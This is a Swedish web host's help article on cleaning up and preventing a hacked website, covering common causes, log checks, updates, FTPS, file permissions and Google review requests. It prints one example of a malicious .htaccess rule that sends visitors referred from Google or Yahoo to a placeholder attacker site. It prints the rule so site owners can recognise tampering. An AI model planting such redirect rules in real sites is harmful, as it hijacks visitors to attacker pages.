Hoppa till innehållet

Cookieinställningar

Välj vilka typer av cookies du tillåter. Du kan alltid ändra ditt val via Cookieinställningar längst ned på varje sida. Integritetspolicy

Nödvändiga

Alltid på

Behövs för att logga in, spara din varukorg och komma ihåg dina val. De är alltid på.

Vilka cookies?
  • weboke_sessie, weboke_klant, weboke_remember: din session och att du förblir inloggad
  • weboke_basket: din varukorg
  • wkBtwIncl: visa priser med eller utan moms
  • wok_cookies: ditt cookieval, 12 månader

Mäter vilken annons som leder till ett besök eller en beställning, så att vi inte betalar för annonser som inte ger något.

Vilka cookies?
  • Google Ads via Google Tag Manager (_gcl_au, _gcl_aw), upp till 90 dagar
  • OpenAI Ads, annonser i ChatGPT
  • wok_aff: via vilken partner du kom till oss (affiliateprogram), 60 dagar

4,6

Country and language

Each country has its own site, with prices and VAT for that country.

View

Hjälp! Min webbplats har hackats. Hur löser eller förhindrar jag det?

Det är tråkigt när ditt konto har hackats. Vi gör allt vi kan för att göra det så svårt som möjligt för hackare, men tyvärr kan det ändå hända att en hackare har fått tillgång till din webbplats. Då gäller det att försöka ta reda på hur hackaren fick tillgång till ditt system.

Det kan vara svårt och tidskrävande, men orsaken/källan är viktig för att kunna förhindra det i framtiden. Att bara ta bort allt och återställa en backup är inte lösningen.

Lägg inte ut den infekterade webbplatsen online igen om du inte är 100 % säker på att problemet är löst och att det är säkert.

Du kan själv tillfälligt inaktivera din domän via kontrollpanelen under domäninställningar (eller via alternativet webbplatser vid Windows-webbhotell), så att den hackade webbplatsen inte kan orsaka mer skada för andra. Du kan även återställa en gammal backup via Installatron (Linux-webbhotell) eller använda vår backupmodul. Se till att du först tar bort alla mappar och filer och först därefter återställer en backup, annars blir nyligen placerade och hackade filer kvar.

Du kan också välja att låta våra experter åtgärda hacket. Eftersom det är ett tidskrävande arbete är den här tjänsten tyvärr inte kostnadsfri.
Klicka här för mer information.

Undersök möjliga orsaker:

  • Den vanligaste orsaken: du använder ett skript eller ett plugin som inte är uppdaterat till senaste versionen, inte är säkert eller innehåller fel. Det kan också vara en modul i till exempel WordPress eller Joomla.
  • Du erbjuder dina besökare en uppladdningsmöjlighet, och en av besökarna har laddat upp ett PHP-program och kört det.
  • Du använder förutsägbara, för enkla lösenord eller lösenord som går att ta reda på via till exempel haveibeenpwned.com.
  • Din dator är infekterad med ett virus eller en mask/keylogger och kommer på det sättet åt lösenord och användarnamn till till exempel ditt FTP-konto.
  • Du har gjort ett formulär där det till exempel går att mata in SQL- eller PHP-kod, eller ett formulär utan Captcha så att det kan användas för att skicka spam.
  • Sök i webbplatsens loggfiler (i DirectAdmin under menyn statistik / loggar) efter misstänkta saker. Sök också i Litespeed/Apache Usage Log och Backed up Apache logs. Leta efter IP-adresser från främmande länder och framför allt efter POST-anrop i kombination med en IP-adress från ett främmande land. Ofta hittar du något där. Via en webbplats som www.whatsmyip.org kan du ta reda på vilket land en IP-adress kommer från.

Hur förhindrar jag ett hack:

  • Viktigast: se till att alla dina skript, som WordPress/Joomla, alltid har de senaste uppdateringarna. Det gäller definitivt även plugins och mallar. Uppdateringar kan oftast enkelt göras via Installatron eller via skriptet självt.
  • Använd FTPS i stället för vanlig FTP
  • Använd ALDRIG DITT användarnamn och lösenord i skript. Om det ändå behövs, skapa då en separat användare för det via kontrollpanelen.
  • Använd bara kända och välrenommerade skript och se till att de hålls uppdaterade.
  • Erbjud ALDRIG uppladdningsmöjligheter. Livsfarligt.

WordPress, Joomla och andra skript: se till att den senaste versionen är installerad!
Det är viktigt att hålla WordPress/Joomla och andra skript uppdaterade. På så sätt kan hack i regel förhindras. Via Installatron (Linux-webbhotell) kan uppdateringar installeras mycket enkelt. Om du inte har installerat WordPress/Joomla eller ett annat skript via Installatron kan du enkelt importera det i Installatron i efterhand och sedan uppdatera skriptet.

Skydda mappar som administrator i Joomla
Det är viktigt att skydda mappar som /administrator extra. Den här artikeln förklarar hur.

Iframe-hack:

Om du har drabbats av iframe-hacket är orsaken ofta ett trojanskt virus som finns på din dator och som ger sig själv tillgång till dina FTP-konton

  • Kontrollera om din webbplats verkligen är hackad. Det kan du till exempel göra via webbplatsen UnmaskParasites.
  • Använd FTPS i stället för FTP för att logga in. FTP skickar all data som läsbar text, medan FTPS krypterar den skickade datan, vilket gör det svårare för hackare att komma åt känsliga uppgifter.
  • Byt nu alla dina FTP-lösenord.
  • Ändra alla mappar (Linux) till chmod 755 och alla filer till chmod 644 via kontrollpanelen/filhanteraren eller via FTP.

HTACCESS-hack / .htaccess har ändrats:

I exemplet nedan har en hackare ändrat din .htaccess. Det gör att Google och Yahoo fortfarande indexerar din webbplats som vanligt, men att alla andra besökare skickas vidare till hackarens webbplats.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteRule .* http://hacker.xx/in.html?= [R,L]

 

Google ser din webbplats som en attackwebbplats ( Rapporterad attackwebbplats! ):

Via länkarna nedan kan du hämta information (fyll i ditt eget domännamn):

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=nl&site=http://www.uwdomein.xx/

Via den här länken kan du bland annat få information, men också skicka en begäran om att ditt domännamn/din webbplats inte längre ska ses som en attackwebbplats. Se dock till att den verkligen är helt rensad!

http://www.google.com/support/webmasters/bin/answer.py?hl=nl&answer=45432

  1. Välj önskad webbplats i översikten i Search Console (tidigare Verktyg för webbansvariga).
  2. Klicka i meddelandet 'Delar av webbplatsen kan sprida skadlig programvara' på 'Mer information'.
  3. Klicka på 'Begär en granskning'.
Var den här artikeln till hjälp?

← Tillbaka till Webbhotell allmänt

Ett ögonblick…

Ställ in dina domäner

Ställ in namnservrar, koppling till ditt webbhotell och vem som blir innehavare för varje domän.

Hämtar dina domäner…